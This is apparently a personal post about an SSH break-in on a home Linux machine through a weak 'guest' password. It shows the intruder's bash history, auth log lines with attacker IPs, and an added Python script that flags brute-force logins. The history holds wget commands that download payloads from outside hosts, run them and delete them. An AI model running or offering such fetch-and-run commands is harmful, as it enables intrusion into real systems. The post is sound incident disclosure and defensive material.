I checked in on some bittorrent progress today at lunch and noticed my process monitor showing full activity. Ran top, saw user "guest" logged on, running 4 instances of a program named "t", and a short-term load average over 4. AARRRRGGGHHH! shutdown -h now! Pulled the network cable, rebooted, looked for damage. Whew, I was O.K. -- I'm sure it helps to be up to date on security and running 2.6.7. Changed all passwords to much stronger ones. Anyhow, I figure turnabout is fair play, so here's the bash history from the "guest" user account, along with the IP addresses the attacker logged in from:
w
uname -a
wc -l /etc/passwd
wget smenlove.home.ro/t.gz ;tar xzvf t.gz ; rm -rf t.gz ; ./t
./t
./t
./t
./t
./t
ls
rm -rf t
kill -9 %1
kill -9 %1
wget smenlove.home.ro/h.tgz ; tar xzvf h.tgz ; rm -rf h.tgz ; ./h2
w
id
./h2
rm -rf h2
wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x brk;./brk
wget vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2 -d brk.bz2;chmod +x brk;./brk
ls
passwd
exit

Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 131.234.157.10
Jul 19 19:54:41 greta sshd[7071]: error: Could not get shadow information for NO USER
Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin from 131.234.157.10 port 35860 ssh2
Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 131.234.157.10
Jul 19 19:54:44 greta sshd[7073]: error: Could not get shadow information for NO USER
Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin from 131.234.157.10 port 35917 ssh2
Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 131.234.157.10
Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test from 156.17.99.11 port 37183 ssh2
Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from 156.17.99.11 port 37228 ssh2
Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user guest by (uid=0)
Jul 22 10:24:47 greta sshd[22407]: (pam_unix) session closed for user guest
Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from 80.110.102.105 port 3938 ssh2
Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user guest by (uid=0)
Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure; logname=guest uid=1002 euid=0 tty= ruser= rhost= user=guest
Jul 22 12:13:16 greta sshd[22597]: (pam_unix) session closed for user guest

I'm not sure the July 19 log snippet is related, but it seems likely.
Anyways, I've re-downloaded the files the attacker used and removed (for posterity). I changed all passwords and the IP address; I found the evidence at about 12:24. Just wanted to share the need for strong passwords.
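A defender-side check for the pattern visible in the sshd log above (a few failed guesses, then an accepted password for "guest" from the same address seconds later), added here as an example and not part of the original post. The sample log lines are constructed in the same format as the post's, with documentation-range addresses in place of the real ones.

```python
import re
from collections import defaultdict

# Regexes for the sshd message formats quoted in the post above. OpenSSH of that
# era logged "Illegal user"; newer releases say "Invalid user", so both match.
IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
FAILED_RE = re.compile(r"Failed password for (?:(?:illegal|invalid) user )?(\S+) from " + IP)
PROBE_RE = re.compile(r"(?:Illegal|Invalid) user (\S+) from " + IP)
ACCEPTED_RE = re.compile(r"Accepted password for (\S+) from " + IP)

def analyze_auth_log(lines, threshold=3):
    """Summarise sshd password activity per source address.

    Returns {ip: {"failures", "users_tried", "accepted", "brute_force",
                  "success_after_failure"}}. The last flag is the pattern in the
    post: guesses against some account, then an accepted password from the same
    address a moment later (a weak password on "guest" being the likely cause).
    """
    stats = defaultdict(lambda: {"failures": 0, "users_tried": set(),
                                 "accepted": [], "success_after_failure": False})
    for line in lines:
        if m := ACCEPTED_RE.search(line):
            user, ip = m.groups()
            stats[ip]["accepted"].append(user)
            if stats[ip]["failures"]:
                stats[ip]["success_after_failure"] = True
        elif m := FAILED_RE.search(line):
            user, ip = m.groups()
            stats[ip]["failures"] += 1
            stats[ip]["users_tried"].add(user)
        elif m := PROBE_RE.search(line):
            user, ip = m.groups()
            stats[ip]["users_tried"].add(user)  # name probed; its failure line follows
    for s in stats.values():
        s["brute_force"] = s["failures"] >= threshold
    return dict(stats)

# Constructed sample in the post's log format, using documentation-range addresses.
SAMPLE_LOG = """\
Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 203.0.113.5
Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin from 203.0.113.5 port 35860 ssh2
Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 203.0.113.5
Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin from 203.0.113.5 port 35917 ssh2
Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 203.0.113.5
Jul 19 19:54:46 greta sshd[7075]: Failed password for illegal user user from 203.0.113.5 port 35950 ssh2
Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test from 198.51.100.7 port 37183 ssh2
Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from 198.51.100.7 port 37228 ssh2
Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from 192.0.2.9 port 3938 ssh2
""".splitlines()
```

Run against a real auth log, any address with success_after_failure set is the one to investigate first; brute_force alone from many addresses is ordinary background noise on an Internet-facing sshd.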